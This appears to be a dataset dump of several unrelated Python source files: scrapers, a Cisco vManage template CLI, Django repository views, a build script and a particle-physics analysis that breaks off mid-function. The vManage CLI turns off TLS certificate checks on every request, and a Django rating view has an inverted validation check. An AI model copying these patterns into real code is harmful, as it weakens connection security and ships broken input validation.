text stringlengths 38 1.54M |
|---|
'''
Created on Jun 29, 2016
@author: mateusz
'''
from src.mvc.model.olx.offer_search_query import OfferSearchQuery
class ApartmentOfferSearchQuery(OfferSearchQuery):
'''
Build an OLX search query for apartments
'''
# OLX offer query url example:
# http://olx.pl/nieruchomosci/mieszkania/wynajem/krakow/q-kurdwan%C3%B3w/?
# search%5Bfilter_float_price%3Afrom%5D=800&
# search%5Bfilter_float_price%3Ato%5D=1600&
# search%5Bfilter_enum_rooms%5D%5B0%5D=two&
# search%5Bfilter_float_m%3Afrom%5D=40&
# search%5Bfilter_float_m%3Ato%5D=70
def __init__(self, *args):
self.OLX_QUERY_BASE_URL = u'http://olx.pl/nieruchomosci/mieszkania/wynajem'
super(ApartmentOfferSearchQuery, self).__init__(*args) |
instructions = []
with open('6.in') as f:
lines = f.read().splitlines()
for line in lines:
i = line.split(' ')
if len(i) == 5: # turn on/off x,y through x',y'
instructions.append((i[1], i[2].split(','), i[4].split(',')))
elif len(i) == 4: # toggle x,y through x',y'
instructions.append((i[0], i[1].split(','), i[3].split(',')))
lights = [0 for _ in range(1000000)]
for i in instructions:
for x in range(int(i[1][0]), int(i[2][0])+1):
for y in range(int(i[1][1]), int(i[2][1])+1):
idx = y * 1000 + x
if i[0] == 'on':
lights[idx] += 1
elif i[0] == 'off':
lights[idx] -= 1
if lights[idx] < 0:
lights[idx] = 0
elif i[0] == 'toggle':
lights[idx] += 2
on = sum(lights)
print(on)
|
import requests
import urllib3
import click
import json
from rich.console import Console
from rich.table import Table
# from rich.text import Text
from vmanage.api.authenticate import authentication
from vmanage.constants import vmanage
from vmanage.api.vpn import generate_dict_vpn_ip_nexthops
import ast
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@click.group(name="template")
def cli_template():
"""Commands to manage Device and Feature Templates: list, show, create, delete
"""
@click.group()
def device():
"""
Manage Device Templates: list, show, create, delete
"""
@click.group()
def feature():
"""
Manage Feature Templates: list, show, create, delete
"""
@click.group(name="create")
def feature_create():
"""
Create Feature Template: banner, system, vpn, vpn-int, ...
"""
@device.command(name="list", help="Get Device Template List")
@click.option('--default/--no-default', help="Print system default templates", default=False)
def template_list(default):
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = "/template/device"
url = base_url + api
response = requests.get(url=url, headers=headers, verify=False)
if response.status_code == 200:
items = response.json()['data']
else:
print("Failed to get list of devices " + str(response.text))
exit()
console = Console()
table = Table(
"Template Name", "Device Model", "Template ID",
"Attached devices", "Template version")
for item in items:
if not default and item["factoryDefault"]:
continue
table.add_row(
f'[green]{item["templateName"]}[/green]',
f'[blue]{item["deviceType"]}[/blue]',
f'[magenta]{item["templateId"]}[/magenta]',
f'[orange1]{item["devicesAttached"]}[/orange1]',
f'[bright_yellow]{item["templateAttached"]}[/bright_yellow]')
console.print(table)
@device.command(name="delete", help="Delete a Device Template")
@click.option("--template_id", help="ID of the template you wish to delete")
def delete_template(template_id):
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = f"/template/device/{template_id}?api_key=/template/device"
url = base_url + api
response = requests.delete(url=url, headers=headers, verify=False)
if response.status_code == 200:
print("Succed to delete the template " + str(template_id))
else:
print("Failed to delete the template " + str(template_id))
exit()
@device.command(name="show", help="Show details of a Device Template")
@click.argument('template_id')
def show_template(template_id):
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = f"/template/device/object/{template_id}?api_key=/template/device"
url = base_url + api
response = requests.get(url=url, headers=headers, verify=False)
if response.status_code == 200:
print(json.dumps(response.json(), indent=4))
else:
print("Failed to show the template " + str(template_id))
exit()
@feature.command(name="list", help="Get Feature Template list")
@click.option('--default/--no-default', help="Print system default templates", default=False)
def feature_list(default):
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = "/template/feature"
url = base_url + api
response = requests.get(url=url, headers=headers, verify=False)
if response.status_code == 200:
items = response.json()['data']
else:
print("Failed to get list of devices " + str(response.text))
exit()
console = Console()
table = Table(
"Template Name", "Template Type")
table.add_column("Device Model", width=15)
table.add_column("Template ID", width=36)
table.add_column("Attached devices", width=10)
table.add_column("Device Templates", width=10)
for item in items:
if not default and item["factoryDefault"]:
continue
table.add_row(
f'[green]{item["templateName"]}[/green]',
f'[blue]{item["templateType"]}[/blue]',
f'[blue]{item["deviceType"]}[/blue]',
f'[magenta]{item["templateId"]}[/magenta]',
f'[orange1]{item["devicesAttached"]}[/orange1]',
f'[bright_green]{item["attachedMastersCount"]}[/bright_green]')
console.print(table)
@feature.command(name="delete", help="Delete a Feature Template")
@click.argument("template_id")
def delete_feature_template(template_id):
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = f"/template/feature/{template_id}?api_key=/template/feature"
url = base_url + api
response = requests.delete(url=url, headers=headers, verify=False)
if response.status_code == 200:
print("Succeed to delete the template " + str(template_id))
else:
print("Failed to delete the template " + str(template_id))
exit()
@feature.command(name="show", help="Show details of a Feature Template")
@click.argument('template_id')
def show_feature_template(template_id):
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = f"/template/feature/object/{template_id}?api_key=/template/feature"
url = base_url + api
response = requests.get(url=url, headers=headers, verify=False)
if response.status_code == 200:
print(json.dumps(response.json(), indent=4))
else:
print("Failed to show the template " + str(template_id))
exit()
class PythonLiteralOption(click.Option):
def type_cast_value(self, ctx, value):
try:
return ast.literal_eval(value)
except:
raise click.BadParameter(value)
@feature_create.command(name="banner", help="Create a Banner Feature Template")
@click.option(
"--types", "-t", cls=PythonLiteralOption, default=[],
help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
def create_feature_template(types, name):
""" Usage: sdwancli template feature create banner -t '["vedge-cloud",
"vedge-1000"]' -n VE-banner-2
"""
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = "/template/feature"
url = base_url + api
payload = {
"deviceType": types,
"templateType": "banner",
"templateMinVersion": "15.0.0",
"templateDefinition": {
"login": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": "This is vEdge Cloud Login banner",
"vipVariableName": "banner_login"
},
"motd": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": "This is vEdge Cloud MOTD banner",
"vipVariableName": "banner_motd"
}
},
"factoryDefault": "false",
"templateName": name,
"templateDescription": "VE-Banner"
}
response = requests.post(
url=url, data=json.dumps(payload), headers=headers, verify=False)
if response.status_code == 200:
print(json.dumps(response.json(), indent=4))
else:
print("Failed to create the template ")
exit()
@feature_create.command(name="system", help="Create a Feature Template System")
@click.option(
"--types", "-t", cls=PythonLiteralOption, default=[],
help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
@click.option("--time_zone", "-time", help="Timezone setting of the System']")
def create_system_feature_template(types, name, time_zone):
""" Usage: sdwancli template feature create banner -t '["vedge-cloud",
"vedge-1000"]' -n VE-banner-2
"""
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = "/template/feature"
url = base_url + api
payload = {
"deviceType": types,
"templateType": "system-vedge",
"templateMinVersion": "15.0.0",
"templateDefinition": {
"clock": {
"timezone": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": time_zone,
"vipVariableName": "system_timezone"
}
},
"site-id": {
"vipObjectType": "object",
"vipType": "variableName",
"vipValue": "",
"vipVariableName": "system_site_id"
},
"system-ip": {
"vipObjectType": "object",
"vipType": "variableName",
"vipValue": "",
"vipVariableName": "system_system_ip"
},
"host-name": {
"vipObjectType": "object",
"vipType": "variableName",
"vipValue": "",
"vipVariableName": "system_host_name"
},
"console-baud-rate": {
"vipObjectType": "object",
"vipType": "ignore",
"vipValue": "_empty",
"vipVariableName": "system_console_baud_rate"
}
},
"factoryDefault": "false",
"templateName": name,
"templateDescription": "VE-System"
}
response = requests.post(
url=url, data=json.dumps(payload), headers=headers, verify=False)
if response.status_code == 200:
print(json.dumps(response.json(), indent=4))
else:
print("Failed to create the template ")
exit()
@feature_create.command(name="vpn", help="Create a Feature Template System")
@click.option(
"--types", "-t", cls=PythonLiteralOption, default=[],
help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
@click.option("--vpn_id", "-id", help="VPN ID of the VPN Template']")
@click.option("--description", "-d", help="Description of the VPN Template']")
@click.option("--prefix", "-p", help="Description of the VPN Template']", required=False)
@click.option(
"--nexthops", "-nh", required=False, cls=PythonLiteralOption, default=[],
help="List of nexthops ip address names, ex. '[\"vpn_g2_if\", \"vpn_g1_if\"]'")
def create_vpn_feature_template(types, name, vpn_id, description, prefix, nexthops):
""" Usage: sdwancli template feature create banner -t '["vedge-cloud",
"vedge-1000"]' -n VE-banner-2
"""
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = "/template/feature"
url = base_url + api
if nexthops:
payload = {
"deviceType": types,
"templateType": "vpn-vedge",
"templateMinVersion": "15.0.0",
"templateDefinition": {
"vpn-id": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": vpn_id
},
"name": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": description,
"vipVariableName": "vpn_name"
},
"ip": {
"route": {
"vipType": "constant",
"vipValue": [
{
"prefix": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": prefix,
"vipVariableName": "vpn_ipv4_ip_prefix"
},
"vipOptional": "false",
"next-hop": {
"vipType": "constant",
"vipValue": generate_dict_vpn_ip_nexthops(nexthops),
"vipObjectType": "tree",
"vipPrimaryKey": [
"address"
]
},
"priority-order": [
"prefix",
"next-hop"
]
}
],
"vipObjectType": "tree",
"vipPrimaryKey": [
"prefix"
]
},
"gre-route": {},
"ipsec-route": {},
"service-route": {}
}
},
"factoryDefault": "false",
"templateName": name,
"templateDescription": "VPN feature template"
}
else:
payload = {
"deviceType": types,
"templateType": "vpn-vedge",
"templateMinVersion": "15.0.0",
"templateDefinition": {
"vpn-id": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": vpn_id
},
"name": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": description,
"vipVariableName": "vpn_name"
},
},
"factoryDefault": "false",
"templateName": name,
"templateDescription": "VPN feature template"
}
response = requests.post(
url=url, data=json.dumps(payload), headers=headers, verify=False)
if response.status_code == 200:
print(json.dumps(response.json(), indent=4))
else:
print("Failed to create the template ")
exit()
@feature_create.command(name="vpn-int", help="Create a Feature Template System")
@click.option(
"--types", "-t", cls=PythonLiteralOption, default=[],
help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
@click.option("--if_name", "-i", help="Interface Name of the VPN INT Template']")
@click.option("--description", "-d", help="Description of the VPN INT']", required=False)
@click.option("--ip_addr_name", "-ip", help="IPv4 variable name']", required=False)
@click.option("--color", "-c", help="Color of the interface']", required=False)
def create_vpn_int_feature_template(types, name, if_name, description, ip_addr_name, color):
""" Usage: sdwancli template feature create banner -t '["vedge-cloud",
"vedge-1000"]' -n VE-banner-2
"""
headers = authentication(vmanage)
base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
api = "/template/feature"
url = base_url + api
if ip_addr_name:
payload = {
"deviceType": types,
"templateType": "vpn-vedge-interface",
"templateMinVersion": "15.0.0",
"templateDefinition": {
"if-name": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": if_name,
"vipVariableName": "vpn_if_name"
},
"description": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": description,
"vipVariableName": "vpn_if_description"
},
"ip": {
"address": {
"vipObjectType": "object",
"vipType": "variableName",
"vipValue": "",
"vipVariableName": ip_addr_name
}
},
"shutdown": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": "false",
"vipVariableName": "vpn_if_shutdown"
},
"tunnel-interface": {
"color": {
"value": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": color,
"vipVariableName": "vpn_if_tunnel_color_value"
},
"restrict": {
"vipObjectType": "node-only",
"vipType": "ignore",
"vipValue": "false",
"vipVariableName": "vpn_if_tunnel_color_restrict"
}
},
"allow-service": {
"sshd": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": "true",
"vipVariableName": "vpn_if_tunnel_sshd"
},
"all": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": "true",
"vipVariableName": "vpn_if_tunnel_all"
},
"netconf": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": "true",
"vipVariableName": "vpn_if_tunnel_netconf"
}
}
}
},
"factoryDefault": "false",
"templateName": name,
"templateDescription": "VPN Interface Ethernet feature template"
}
else:
payload = {
"deviceType": types,
"templateType": "vpn-vedge-interface",
"templateMinVersion": "15.0.0",
"templateDefinition": {
"if-name": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": if_name,
"vipVariableName": "vpn_if_name"
},
"description": {
"vipObjectType": "object",
"vipType": "constant",
"vipValue": description,
"vipVariableName": "vpn_if_description"
}
},
"factoryDefault": "false",
"templateName": name,
"templateDescription": "VPN Interface Ethernet feature template"
}
response = requests.post(
url=url, data=json.dumps(payload), headers=headers, verify=False)
if response.status_code == 200:
print(json.dumps(response.json(), indent=4))
else:
print("Failed to create the template ")
exit()
cli_template.add_command(device)
cli_template.add_command(feature)
feature.add_command(feature_create)
|
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from desktopsite.apps.repository.models import *
from desktopsite.apps.repository.forms import *
from desktopsite.apps.repository.categories import REPOSITORY_CATEGORIES
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
def index(request):
latest = Version.objects.all().order_by("-creation_date")[:8]
top_rated = Rating.objects.top_rated(8)
featured = Rating.objects.featured(5)
return render_to_response('repository/index.html', {
'categories': REPOSITORY_CATEGORIES,
'latest': latest,
'top_rated': top_rated,
'featured': featured,
}, context_instance=RequestContext(request))
def byLetter(request, letter):
results = Package.objects.filter(name__startswith=letter)
return showResults(request, "Packages starting with \"%s\"" % letter, results)
def byCategory(request, category):
results = Package.objects.filter(category__exact=category)
return showResults(request, "Packages in \"%s\"" % category, results)
@login_required
def userPackages(request):
results = Package.objects.filter(maintainer__exact=request.user)
return showResults(request, "My Packages", results)
def search(request):
if request.GET.has_key("q"):
query = request.GET["q"]
else:
query = ""
if query:
results = Package.objects.filter(name__contains=query)
else:
results = []
return showResults(request, "Results for \"%s\"" % query, results)
def showResults(request, title, resultset):
return render_to_response('repository/results.html', {
'results': resultset,
'title': (title if title else "Search Results"),
}, context_instance=RequestContext(request))
def package(request, sysname):
pak = get_object_or_404(Package, sysname=sysname)
version = pak.get_versions_desc()
if not version:
version = {}
else:
version = version[0]
return render_to_response('repository/package.html', {
'package': pak,
'version': version,
}, context_instance=RequestContext(request))
def version(request, sysname, version):
pak = get_object_or_404(Package, sysname=sysname)
version = get_object_or_404(Version, package=pak, name=version)
return render_to_response('repository/version.html', {
'package': pak,
'version': version,
}, context_instance=RequestContext(request))
@login_required
def saveRating(request):
pk = request.POST["versionId"]
version = get_object_or_404(Version, pk=pk)
value = request.POST["value"]
if not (value < 0 or value > 5):
return HttpResponse("nice try asshole", mimetype="text/plain")
try:
rating, created=Rating.objects.get_or_create(version=version, user=request.user,
defaults={'score': value})
except Rating.MultipleObjectsReturned:
#this happens on occasion, not sure why
Rating.objects.filter(version=version, user=request.user).delete()
rating = Rating(version=version, user=request.user)
if value == "0":
rating.delete()
else:
rating.score=value
rating.save()
return HttpResponse("ok", mimetype="text/plain")
@login_required
def newPackage(request):
if request.method == 'POST':
form = PackageForm(request.POST, request.FILES)
if form.is_valid():
package = form.save(commit=False)
package.maintainer = request.user
package.save()
request.user.message_set.create(message='New Package Created')
return HttpResponseRedirect(package.get_absolute_url())
else:
form = PackageForm()
return render_to_response("repository/form.html", context_instance=RequestContext(request, {
'title': "New Package",
'form': form,
}))
@login_required
def newVersion(request, sysname):
package = get_object_or_404(Package, sysname=sysname)
if not package.user_is_maintainer():
return HttpResponseRedirect(package.get_absolute_url())
if request.method == 'POST':
form = VersionForm(request.POST, request.FILES)
form._requested_package = package
is_valid = form.is_valid()
if is_valid:
version = form.save() #commit=False ommitted purposefully!
version.package = package
version.calc_md5sum()
request.user.message_set.create(message='New Version Created')
return HttpResponseRedirect(version.get_absolute_url())
else:
form = VersionForm()
return render_to_response("repository/form.html", context_instance=RequestContext(request, {
'title': "New Version for %s" % package.name,
'form': form,
}))
@login_required
def editPackage(request, sysname):
package = get_object_or_404(Package, sysname=sysname)
if not package.user_is_maintainer():
return HttpResponseRedirect(package.get_absolute_url())
if request.method == 'POST':
form = PackageForm(request.POST, request.FILES, instance=package)
if form.is_valid():
package = form.save(commit=False)
#package.maintainer = request.user
package.save()
request.user.message_set.create(message='Changes Saved')
return HttpResponseRedirect(package.get_absolute_url())
else:
form = PackageForm(instance=package)
return render_to_response("repository/form.html", context_instance=RequestContext(request, {
'title': "Editing %s" % package.name,
'form': form,
}))
@login_required
def editVersion(request, sysname, version):
package = get_object_or_404(Package, sysname=sysname)
version = get_object_or_404(Version, name=version, package=package)
if not package.user_is_maintainer():
return HttpResponseRedirect(package.get_absolute_url())
if request.method == 'POST':
form = EditVersionForm(request.POST, request.FILES, instance=version)
if form.is_valid():
version = form.save(commit=False)
version.package = package
version.save()
request.user.message_set.create(message='Changes Saved')
return HttpResponseRedirect(version.get_absolute_url())
else:
form = EditVersionForm(instance=version)
return render_to_response("repository/form.html", context_instance=RequestContext(request, {
'title': "Editing %s %s" % (package.name, version.name),
'form': form,
}))
@login_required
def deleteVersion(request, sysname, version):
package = get_object_or_404(Package, sysname=sysname)
version = get_object_or_404(Version, name=version, package=package)
if not package.user_is_maintainer():
return HttpResponseRedirect(package.get_absolute_url())
return doDeleteView(request, version, package.get_absolute_url())
@login_required
def deletePackage(request, sysname):
package = get_object_or_404(Package, sysname=sysname)
if not package.user_is_maintainer():
return HttpResponseRedirect(package.get_absolute_url())
return doDeleteView(request, package, "/repository/")
def doDeleteView(request, object, finishUrl):
if request.method == 'POST':
if request.POST.has_key("Yes"):
request.user.message_set.create(message='%s Deleted.' % object)
object.delete()
return HttpResponseRedirect(finishUrl)
else:
return HttpResponseRedirect(object.get_absolute_url())
else:
return render_to_response("repository/delete.html", context_instance=RequestContext(request, {
'object': object,
}))
|
import os, sys, argparse, stat, traceback, shutil, subprocess, logging, json
import glob
logging.basicConfig(level=logging.WARNING)
log = logging.getLogger(os.path.basename(__file__))
mapping = [
[ "backend/*.cpp" , None ],
[ "backend/*.d" , None ],
[ "backend/*.h" , None ],
[ "backend/*.i" , None ],
[ "backend/*.l" , None ],
[ "backend/*.lo" , None ],
[ "backend/*.y" , None ],
[ "backend/*.yo" , None ],
[ "dbupdate/*.cpp" , None ],
[ "dbupdate/*.d" , None ],
[ "dbupdate/*.h" , None ],
[ "dbupdate/*.i" , None ],
[ "network/*.cpp" , None ],
[ "network/*.d" , None ],
[ "network/*.h" , None ],
[ "network/*.i" , None ],
[ "tools/*.cpp" , None ],
[ "tools/*.d" , None ],
[ "tools/*.h" , None ],
[ "tools/*.i" , None ],
[ "kernel/*.cpp" , None ],
[ "kernel/*.d" , None ],
[ "kernel/*.h" , None ],
[ "kernel/*.i" , None ],
[ "backend\VpOpenDialog_Not.h" , "VpOpenDialog.h" ],
[ "kernel\VpFileMapping_Win32_1x.h" , "VpFileMapping.h" ],
[ "kernel\VpSocket_Win32_1x.h" , "VpSocket.h" ],
[ "kernel\Vp_Win32_1x.h" , "Vp.h" ],
]
sourceMap = {}
destMap = {}
movesFile = ".windowsMoves.json"
def addMove(source, dest):
if dest in destMap:
log.warning(
"destination collision at '" + dest + "': '" + source + "' and '" + destMap[dest]
)
del sourceMap[destMap[dest]]
if source in sourceMap:
log.warning(
"source collision at '" + source + "': '" + dest + "' and '" + sourceMap[source]
)
del destMap[sourceMap[source]]
sourceMap[source] = dest
destMap[dest] = source
def buildMoves():
for maps in mapping:
srcglob = maps[0]
dest = maps[1]
moves = glob.glob(srcglob)
if dest is not None:
if len(moves) == 0:
log.warning(
"destination '" + dest + "' has no source: '" + str(srcglob)
)
elif len(moves) == 1:
source = moves[0]
addMove(source, dest)
else:
raise RuntimeError(
"collision within a single glob: " + srcglob + str(moves)
)
else:
if len(moves) == 0:
log.warning(
"mapping '" + str(srcglob) + "' had no matches"
)
for move in moves:
source = move
dest = os.path.basename(source)
addMove(source, dest)
def saveMoves(filename):
with open(filename, "w") as fo:
json.dump(destMap, fo)
def readMoves(filename):
global sourceMap
with open(filename) as fi:
sourceMap = json.load(fi)
def doMoves(movesDict):
for src, dest in movesDict.iteritems():
shutil.move(src, dest)
def main(args):
root = args.directory
os.chdir(os.path.join(root, "src"))
print os.path.exists(movesFile)
if not os.path.exists(movesFile):
print "Building File Moves"
buildMoves()
saveMoves(movesFile)
else:
readMoves(movesFile)
os.remove(movesFile)
print "Moving " + str(len(sourceMap)) + " files"
doMoves(sourceMap)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="switchWindowsBuild.py moves vision source to a layout that builds in Visual Studio. And back again"
)
parser.add_argument("directory",
help="directory to switch"
)
main(parser.parse_args())
|
from time import ctime,sleep
import multiprocessing
def talk(content,loop):
for i in range(loop):
print("Talk:%s %s"%(content,ctime()))
sleep(2)
def write(content,loop):
for i in range(loop):
print("write:%s %s"%(content,ctime()))
sleep(3)
process=[]
p1=multiprocessing.Process(target=talk,args=('hello,51zxw',2))
process.append(p1)
p2=multiprocessing.Process(target=write,args=('Python',2))
process.append(p2)
if __name__=='__main__':
for p in process:
p.start()
for p in process:
p.join()
print("All Thread end!%s"%ctime()) |
from bs4 import BeautifulSoup as bs
from requests import Session
s = Session()
f = open('opel.txt',mode='w',encoding='utf-8')
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0'}
# url = 'https://www.autoscout24.com/lst/?sort=standard&desc=0&fuel=3&ustate=N%2CU&size=20&page={}&atype=C&'
url = 'https://www.autoscout24.com/lst/opel?sort=standard&desc=0&offer=S&ustate=N%2CU&size=20&page={}&atype=C&'
for i in range(1,21):
m_url = url.format(i)
r = s.get(m_url,headers=headers)
soup = bs(r.content,'html.parser')
a = soup.find_all('div','cldt-summary-titles')
for j in a:
aa = j.find('a')
f.write('https://www.autoscout24.com'+aa.get('href')+'?cldtidx=1&cldtsrc=listPage'+'\n')
print(m_url) |
from bloghandler import BlogHandler
from models.user import User
from models.post import Post
from helper import *
from google.appengine.ext import db
class EditPost(BlogHandler):
def get(self):
if self.user:
self.render("editpost.html")
else:
self.redirect("/login")
return
def post(self):
if not self.user:
self.redirect('/blog')
return
author = self.get_user_name()
post_id = self.request.get('post_id')
post_id = int(post_id)
post = self.find_post_from_db(post_id)
subject = self.request.get('subject')
content = self.request.get('content')
if not post_id:
self.redirect('/blog/newpost')
return
if not post:
self.error(404)
return
if post.author != author:
msg = "Oops, you are not the author of this post"
self.render('login-form.html', error=msg)
return
if subject and content:
post.subject = subject
post.content = content
post.put()
self.redirect('/blog/%s' % str(post.key().id()))
return
else:
error = "subject and content, please!"
self.render("editpost.html", subject=subject,
content=content, error=error)
return
|
#!/usr/bin/env python
"""For AN
leptonjets efficiencies and resolutions
"""
import argparse
import awkward
import coffea.processor as processor
import numpy as np
import matplotlib.pyplot as plt
from coffea import hist
from coffea.analysis_objects import JaggedCandidateArray
from FireHydrant.Analysis.DatasetMapLoader import (DatasetMapLoader,
SigDatasetMapLoader)
from FireHydrant.Tools.correction import (get_nlo_weight_function,
get_pu_weights_function,
get_ttbar_weight)
from FireHydrant.Tools.metfilter import MetFilters
from FireHydrant.Tools.trigger import Triggers
np.seterr(divide='ignore', invalid='ignore', over='ignore')
plt.rcParams["savefig.dpi"] = 120
plt.rcParams["savefig.bbox"] = "tight"
parser = argparse.ArgumentParser(description="[AN] leptonjet efficiencies/resolutions")
parser.add_argument("--sync", action='store_true', help="issue rsync command to sync plots folder to lxplus web server")
args = parser.parse_args()
# dml = DatasetMapLoader()
# bkgDS, bkgMAP, bkgSCALE = dml.fetch('bkg')
# dataDS, dataMAP = dml.fetch('data')
sdml = SigDatasetMapLoader()
sigDS_2mu2e, sigSCALE_2mu2e = sdml.fetch('2mu2e')
sigDS_4mu, sigSCALE_4mu = sdml.fetch('4mu')
class MuEffiResoProcessor(processor.ProcessorABC):
def __init__(self):
dataset_axis = hist.Cat('dataset', 'dataset')
lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 700)
reso_axis = hist.Bin('reso', '($p_T$(reco)-$p_T$(gen))/$p_T$(gen)', 100, -1, 2)
reco_axis = hist.Cat('reco', 'reco type')
self._accumulator = processor.dict_accumulator({
'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-pf': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-dsa': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'reso': hist.Hist('Norm. Frequency/0.03', dataset_axis, reso_axis, reco_axis),
})
@property
def accumulator(self):
return self._accumulator
def process(self, df):
output = self.accumulator.identity()
dataset = df['dataset']
genparticles = JaggedCandidateArray.candidatesfromcounts(
df['gen_p4'],
px=df['gen_p4.fCoordinates.fX'].content,
py=df['gen_p4.fCoordinates.fY'].content,
pz=df['gen_p4.fCoordinates.fZ'].content,
energy=df['gen_p4.fCoordinates.fT'].content,
pid=df['gen_pid'].content,
vx=df['gen_vtx.fCoordinates.fX'].content,
vy=df['gen_vtx.fCoordinates.fY'].content,
vz=df['gen_vtx.fCoordinates.fZ'].content,
charge=df['gen_charge'].content,
)
genparticles.add_attributes(rho=np.hypot(genparticles.vx, genparticles.vy))
genmuons = genparticles[(np.abs(genparticles.pid)==13)&(genparticles.pt>10)&(np.abs(genparticles.eta)<2.4)&(genparticles.rho<700)]
## at least 2 good gen muons
nmuGe2 = genmuons.counts>=2
genmuons = genmuons[nmuGe2]
ljsources = JaggedCandidateArray.candidatesfromcounts(
df['ljsource_p4'],
px=df['ljsource_p4.fCoordinates.fX'].content,
py=df['ljsource_p4.fCoordinates.fY'].content,
pz=df['ljsource_p4.fCoordinates.fZ'].content,
energy=df['ljsource_p4.fCoordinates.fT'].content,
pid=df['ljsource_type'].content,
charge=df['ljsource_charge'].content,
)
muons = ljsources[(ljsources.pid==3)|(ljsources.pid==8)][nmuGe2]
matchidx = genmuons.argmatch(muons, deltaRCut=0.3)
genmuons_ = genmuons[muons.counts!=0]
sameq = (muons[matchidx][muons.counts!=0].charge==genmuons_.charge)&(matchidx[muons.counts!=0]!=-1)
output['lxy'].fill(dataset=dataset, lxy=genmuons_[sameq].rho.flatten(), reco='true')
output['lxy'].fill(dataset=dataset, lxy=genmuons.rho.flatten(), reco='inclusive')
genpt = genmuons_[sameq].pt.flatten()
recopt = muons[matchidx][muons.counts!=0][sameq].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='(PFMu+DSAMu)')
muons = ljsources[(ljsources.pid==3)][nmuGe2]
matchidx = genmuons.argmatch(muons, deltaRCut=0.3)
genmuons_ = genmuons[muons.counts!=0]
sameq = (muons[matchidx][muons.counts!=0].charge==genmuons_.charge)&(matchidx[muons.counts!=0]!=-1)
output['lxy-pf'].fill(dataset=dataset, lxy=genmuons_[sameq].rho.flatten(), reco='true')
output['lxy-pf'].fill(dataset=dataset, lxy=genmuons.rho.flatten(), reco='inclusive')
genpt = genmuons_[sameq].pt.flatten()
recopt = muons[matchidx][muons.counts!=0][sameq].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='PFMu')
muons = ljsources[(ljsources.pid==8)][nmuGe2]
matchidx = genmuons.argmatch(muons, deltaRCut=0.3)
genmuons_ = genmuons[muons.counts!=0]
sameq = (muons[matchidx][muons.counts!=0].charge==genmuons_.charge)&(matchidx[muons.counts!=0]!=-1)
output['lxy-dsa'].fill(dataset=dataset, lxy=genmuons_[sameq].rho.flatten(), reco='true')
output['lxy-dsa'].fill(dataset=dataset, lxy=genmuons.rho.flatten(), reco='inclusive')
genpt = genmuons_[sameq].pt.flatten()
recopt = muons[matchidx][muons.counts!=0][sameq].pt.flatten()
output['reso'].fill(dataset=dataset, reso=(recopt-genpt)/genpt, reco='DSAMu')
return output
def postprocess(self, accumulator):
return accumulator
class MuLJEffiResoProcessor(processor.ProcessorABC):
def __init__(self):
dataset_axis = hist.Cat('dataset', 'dataset')
lxy_axis = hist.Bin('lxy', 'lxy [cm]', 100, 0, 700)
reso_axis = hist.Bin('reso', '($p_T$(reco)-$p_T$(gen))/$p_T$(gen)', 100, -1, 2)
reco_axis = hist.Cat('reco', 'reco type')
self._accumulator = processor.dict_accumulator({
'lxy': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-pf': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'lxy-dsa': hist.Hist('Counts', dataset_axis, lxy_axis, reco_axis),
'reso': hist.Hist('Norm. Frequency/0.03', dataset_axis, reso_axis, reco_axis),
})
@property
def accumulator(self):
return self._accumulator
def process(self, df):
output = self.accumulator.identity()
dataset = df['dataset']
genparticles = JaggedCandidateArray.candidatesfromcounts(
df['gen_p4'],
px=df['gen_p4.fCoordinates.fX'].content,
py=df['gen_p4.fCoordinates.fY'].content,
